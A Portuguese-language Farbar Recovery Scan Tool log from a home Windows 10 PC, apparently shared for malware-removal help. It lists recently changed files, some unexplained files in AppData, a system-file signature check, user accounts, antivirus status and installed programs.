2017-08-03 11:10 - 2016-12-19 14:53 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-03 11:05 - 2017-03-18 08:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-02 09:56 - 2017-03-18 18:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-02 09:56 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-01 08:51 - 2017-02-17 00:13 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\qBittorrent
2017-07-31 21:40 - 2015-11-12 13:14 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Skyrim
2017-07-31 17:07 - 2017-05-02 14:51 - 000000000 ____D C:\Users\Hercílio\Desktop\Laryssa
2017-07-31 14:47 - 2017-05-06 19:05 - 000000000 ____D C:\Users\Todos os Usuários\Package Cache
2017-07-31 14:47 - 2017-05-06 19:05 - 000000000 ____D C:\ProgramData\Package Cache
2017-07-31 14:29 - 2017-03-06 08:11 - 000000000 ____D C:\Games
2017-07-31 14:10 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-07-31 13:11 - 2016-04-10 09:17 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Crashlands
2017-07-30 18:31 - 2015-05-23 13:14 - 000000000 ____D C:\KMPlayer
2017-07-23 13:57 - 2016-03-11 15:20 - 000000000 ____D C:\Program Files (x86)\Steam
2017-07-20 10:41 - 2017-05-06 19:07 - 000000000 ____D C:\Users\Hercílio
2017-07-20 10:38 - 2017-03-18 08:40 - 002359296 _____ C:\WINDOWS\system32\config\BBI
2017-07-17 07:49 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\Registration
2017-07-16 19:00 - 2017-04-07 17:10 - 000000000 ____D C:\stremio-cache
2017-07-16 08:20 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\rescache
2017-07-14 19:56 - 2017-05-26 12:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gwent [GOG.com]
2017-07-14 19:56 - 2015-08-20 13:49 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mass Effect 2
2017-07-14 19:56 - 2015-05-21 15:49 - 000000000 ____D C:\Users\Hercílio\Desktop\Jogos
2017-07-14 19:54 - 2017-05-06 15:21 - 000000000 ___DC C:\WINDOWS\Panther
2017-07-14 19:54 - 2015-05-21 14:16 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\DAEMON Tools Pro
2017-07-14 19:31 - 2017-04-30 21:47 - 000984032 _____ (Realtek ) C:\WINDOWS\system32\Drivers\rt640x64.sys
2017-07-14 19:17 - 2017-05-06 19:04 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-07-14 19:17 - 2017-04-30 22:29 - 000000000 ____D C:\WINDOWS\system32\RTCOM
2017-07-14 19:15 - 2017-05-06 19:37 - 000003218 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_PushButton
2017-07-14 19:15 - 2017-05-06 19:04 - 001019725 _____ C:\WINDOWS\system32\Drivers\rtwavesskdy.dat
2017-07-14 19:15 - 2017-05-06 19:04 - 000031095 _____ C:\WINDOWS\system32\Drivers\rtwavesEFX.dat
2017-07-14 19:15 - 2017-05-06 19:04 - 000010945 _____ C:\WINDOWS\system32\Drivers\rtwavesMFX.dat
2017-07-14 19:12 - 2017-04-30 22:28 - 005545512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2017-07-14 19:12 - 2017-04-30 22:28 - 003503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2017-07-14 19:12 - 2017-04-30 22:28 - 003203424 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2017-07-14 19:12 - 2017-04-30 22:28 - 000192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2017-07-14 19:12 - 2017-04-30 22:28 - 000023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2017-07-14 18:58 - 2016-10-15 00:16 - 000183480 _____ (Intel Corporation) C:\WINDOWS\system32\ibtsiva.exe
2017-07-14 18:58 - 2015-05-21 11:36 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Packages
2017-07-14 18:50 - 2015-05-06 16:43 - 000022864 _____ (OSR Open Systems Resources, Inc.) C:\WINDOWS\system32\Drivers\DellRbtn.sys
2017-07-14 13:10 - 2015-06-03 19:35 - 000000000 ____D C:\Users\Hercílio\Documents\My Games
2017-07-14 09:50 - 2017-03-18 16:27 - 000000000 ____D C:\Program Files (x86)\Deathtrap
2017-07-14 09:46 - 2017-05-24 16:22 - 000000000 ____D C:\Program Files (x86)\The Witcher Enhanced Edition Director's Cut
2017-07-14 09:43 - 2015-05-06 12:43 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-07-13 19:17 - 2017-05-26 12:58 - 000000000 ____D C:\Program Files (x86)\GOG Galaxy
2017-07-13 18:41 - 2015-07-28 10:41 - 000000000 ____D C:\Users\Hercílio\AppData\Local\ElevatedDiagnostics
2017-07-13 17:56 - 2017-05-06 19:37 - 000004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-07-13 17:56 - 2015-11-03 11:54 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-07-13 17:11 - 2015-05-22 16:26 - 000000000 ____D C:\Program Files (x86)\Ubisoft
2017-07-13 17:01 - 2016-08-29 20:46 - 000047672 _____ (Disc Soft Ltd) C:\WINDOWS\system32\Drivers\dtultrausbbus.sys
2017-07-12 20:37 - 2015-05-21 11:27 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-07-12 20:20 - 2017-05-06 19:00 - 000408192 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2017-07-12 09:39 - 2017-03-18 17:51 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-07-12 09:35 - 2015-05-23 04:09 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-07-12 09:31 - 2015-05-23 04:09 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-07-06 20:13 - 2017-06-24 13:11 - 000000000 ____D C:\Users\Todos os Usuários\SupportAssist
2017-07-06 20:13 - 2017-06-24 13:11 - 000000000 ____D C:\ProgramData\SupportAssist
 
==================== Arquivos na raiz de alguns diretórios =======
 
2017-08-03 08:19 - 2017-08-03 08:19 - 000245264 _____ () C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73
2017-08-03 08:19 - 2017-08-03 08:19 - 000047120 _____ () C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6
2015-06-09 11:40 - 2015-07-25 11:11 - 000000024 _____ () C:\Users\Hercílio\AppData\Roaming\appdataFr25.bin
2016-01-05 15:33 - 2016-01-09 21:50 - 000000476 _____ () C:\Users\Hercílio\AppData\Roaming\del.bat
2017-08-03 08:19 - 2017-08-03 08:19 - 000253456 _____ () C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262
2017-08-03 08:19 - 2017-08-03 08:19 - 000936976 _____ () C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED
2017-08-03 08:19 - 2017-08-03 08:19 - 000232464 _____ () C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255
2017-08-03 11:15 - 2017-08-03 11:15 - 001835008 _____ () C:\Users\Hercílio\AppData\Roaming\pxese.exe
2017-03-24 09:20 - 2017-03-24 09:35 - 000007611 _____ () C:\Users\Hercílio\AppData\Local\resmon.resmoncfg
2016-01-03 12:55 - 2016-01-03 12:55 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{31609F87-792D-452B-A799-CB0D7B589CF5}
2015-10-11 21:46 - 2015-10-11 21:46 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{5E3C3A73-CDE7-406C-A35C-482B7D6618E2}
2015-11-17 20:46 - 2015-11-17 20:46 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{6F2A5D38-59DF-44FC-A339-6546150E9A01}
2016-03-30 15:02 - 2016-03-30 15:02 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{85380981-3389-4860-8A4F-201B694530DF}
2015-10-23 20:46 - 2015-10-23 20:46 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{DFA58381-49E3-4E5B-A149-EB3B89B425DA}
2016-05-02 15:02 - 2016-05-02 15:02 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{E8EF03DA-F8BA-439A-A4BB-546EEE37B099}
2016-04-05 15:02 - 2016-04-05 15:02 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{FEECC933-41BE-42BE-A6B8-8C8722F071D8}
2017-05-06 19:04 - 2017-05-06 19:04 - 000000000 ____H () C:\ProgramData\DP45977C.lfl
 
==================== Bamital & volsnap ======================
 
(Não há correção automática para arquivos que não passaram na verificação.)
 
C:\WINDOWS\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\wininit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\explorer.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\svchost.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\services.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\User32.dll => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\userinit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente
 
LastRegBack: 2017-07-27 23:58
 
==================== Fim de FRST.txt ============================
 
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 31-07-2017
Executado por Hercílio (03-08-2017 15:35:02)
Executando a partir de C:\Users\Hercílio\Desktop
Windows 10 Home Single Language Versão 1703 (X64) (2017-05-06 22:51:30)
Modo da Inicialização: Normal
==========================================================
 
 
==================== Contas: =============================
 
Administrador (S-1-5-21-459013025-3067968454-1995941679-500 - Administrator - Disabled)
Convidado (S-1-5-21-459013025-3067968454-1995941679-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-459013025-3067968454-1995941679-503 - Limited - Disabled)
Hercílio (S-1-5-21-459013025-3067968454-1995941679-1001 - Administrator - Enabled) => C:\Users\Hercílio
 
==================== Central de Segurança ========================
 
(Se uma entrada for incluída na fixlist, será removida.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Programas Instalados ======================
 
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
 
«Dark Souls II - Scholar of the First Sin» 1.02 (HKLM-x32\...\«Dark Souls II - Scholar of the First Sin»_is1) (Version: 1.02 - Namco Bandai)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.3.183.90 - Adobe Systems Incorporated)
Advanced SystemCare 10 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 10.4.0 - IObit)
AMD Catalyst Install Manager (HKLM\...\{2A570AD7-943C-944A-262B-4794578E8E33}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
Assistente de Atualização do Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17387 - Microsoft Corporation)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Bethesda.net Launcher (HKLM-x32\...\{3448917E-E4FE-4E30-9502-9FD52EABB6F5}_is1) (Version: 1.21.7 - Bethesda Softworks)
Catalyst Control Center Next Localization BR (HKLM\...\{3E245378-BF77-6946-C6F6-096DBE5EAB82}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{51F85784-6799-5CA3-97B2-2E5904FC3E58}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{55A4D3AB-C8DF-26B2-89A8-7E16E1E40700}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{365AEAB2-4CF3-7CBB-0DAC-E9E14B688E65}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{45907537-804A-514F-5280-5F4F12A6DCBC}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{8E6F5592-ED7E-9C50-74AC-BF417B1FE291}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{7ABC6D83-816E-6D48-E65D-B0CEDD294E4E}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{962364E4-08BB-347D-32E7-2B789F37BF8A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{AD28960A-6190-C991-C964-308B86EAA2E2}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{84C3F2C5-F7B2-2F08-CDF4-79EF7CC55D74}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{A0407E39-2AA4-60B3-885F-3C5347B6909E}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{C3EE628C-7394-FE2C-0C90-C05284EB528D}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0989D0EA-AFF3-5F9A-3D25-20EE133E409B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0E8A3B17-D603-B1B6-C205-1685EBDD23E9}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{2F544F46-5F6E-97BB-3550-A0242A3C5754}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{1E7D3072-1D28-E33A-99DF-85D9F7ECD06E}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{A8689A0F-5928-7300-B82B-C5E85131B7BA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{FC4086D6-E345-5F43-08BB-280FB57DAF49}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{76AAF56B-93D8-161D-809A-EC05F3B913DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{BA26B70C-3D8C-2D14-4122-211FB3E6F691}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{F8EBE530-A4D5-BF51-F623-3787E6B8A878}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{063CED74-F5F0-870E-DC9C-2D78FDEDA3EE}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{42FBD43F-DE53-6D4D-5134-E3C93B45CBEF}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{5FEACE78-C338-9AED-FF05-7DE7E273C774}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{13BB60AA-88F7-4B1F-2DEC-D81EEDE8B3AA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{A3795528-F572-6314-C4E3-EE9DAF0FBF02}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{AC85CF50-9A55-0103-ADBF-365C37603AA4}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{37AA6227-FF2C-95AC-87C0-45DCC0BB87DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{4853A56D-7931-A08B-5BA7-8E2D61043DF9}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{B349892D-B015-033C-4CA8-3635E6B655D7}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{B28CF677-E2C8-12CA-52BB-19B6F066D36A}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{BE8D6AB1-3049-2F0C-67FA-00C0A5D321A3}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{EB328356-1DF0-1CCE-3607-6361DD329219}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{26567561-DFB2-2B63-9BA8-6A490ED37016}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{43F6D22B-E0E9-EE90-9B62-1C5FC5D15A55}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{87E6EC29-AEC5-28CB-F773-93EB6C1B8A2B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{0809FEC1-EF86-51E9-8210-DC1B1BDB6745}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{CA55697D-BD74-3ED8-6B21-D7EDAD3B7D02}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{D4490E0F-8E7B-1097-B56A-7643C75F1C28}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{5FD706FF-6AD8-E372-A35A-879409982655}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{CFC860C8-4F51-E08C-A74C-2E444ED06160}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{DAB44116-0266-C65B-B643-AC11217C3041}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{3AF70346-52C7-0334-606F-118D1C1CB7A2}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{9338D693-38B7-1ED4-9B42-BFA1D5600CCB}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{A4E7CA0C-84EB-5E29-2F04-06C4E4790C2F}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{53AE8AC7-5213-67AF-0DC0-CED696B77643}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{59D2664C-949B-7FA7-9880-ECB993B6616A}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{C971C145-258D-6650-7088-13DDB161327A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{970A40CA-46AB-986C-1798-976ED0EA00FA}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{DC9DFCBF-87DA-892C-6151-99CC9EF46E3E}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{EBA09DAF-14B4-7BE7-676E-6E2FB21EDBDD}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4707CBFC-8ED4-463E-0FF9-DE86F4A743E9}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{9AA4DD93-94BF-22EA-C9D2-7084F304A31B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{C1EFF2A2-DF4A-F6D1-B99C-1ED194AE9E78}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{379D900B-A785-6DB0-012E-434356A365B3}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{46EB68BE-8AAC-8C2B-7284-8DEDE6B5CD2A}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{C14A3A5B-8A86-C239-37D7-158211778C54}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{366C4FB5-CF6E-258B-418D-E6D29549A278}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{7A6E431B-CF43-EC3E-FD7E-0A0AAB1B25FC}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{A50C89BC-8D8E-8828-824A-7171F6D583D5}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{0B5633F0-C415-2F08-671E-4C9E2FAACD45}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{89A1F076-19B8-A2B1-D5A3-E8247EFAF157}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B10089DE-934F-6E0F-683A-B788F89348DF}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version:  - Progdigy Software S.A.R.L.)
